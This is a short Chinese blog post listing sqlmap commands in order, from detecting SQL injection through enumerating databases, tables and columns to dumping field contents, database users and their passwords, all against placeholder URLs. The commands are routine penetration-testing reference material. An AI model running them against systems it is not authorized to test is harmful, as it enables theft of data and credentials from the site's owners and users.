文章最后更新时间为:2021 年 06 月 04 日 09:29:42 Loading... 1. 判断是否存在注入 > sqlmap -u url *当注入点后面的参数大于等于两个时,url需要加双引号* 2. 查询当前用户下的所有数据库 > sqlmap -u url –-dbs *用于查询当前用户下的所有数据库,前提是当前用户有权限读取包含所有数据库列表信息的表* 3. 获取数据库中的表名 > sqlmap -u url -D 数据库名 –-tables *-D是指定某一个具体的数据库,如果没有指定,则会列出数据库中所有的库的表* 4. 获取表中的字段名 > sqlmap -u URL -D 数据库名 -T 表名 –-columns 5. 获取字段内容 > sqlmap -u URL -D 数据库名 -T 表名 -C 字段名1,字段名2 –-dump 6. 获取数据库的所有用户 > sqlmap -u URL –-users *前提是当前用户有权限读取包含所有用户的表的权限* 7. 获取数据库用户的密码 > sqlmap -u url –passwords *列出数据库用户的密码,前提是当前用户有读取包含用户密码的权限* 8. 获取当前网站数据库的名称 > sqlmap -u URL –-current-db 9. 获取当前网站数据库的用户名称 > sqlmap -u URL –-current-user Last modification:June 4, 2021 © Allow specification reprint Support Appreciate the author Like 0 如果觉得我的文章对你有用,请随意赞赏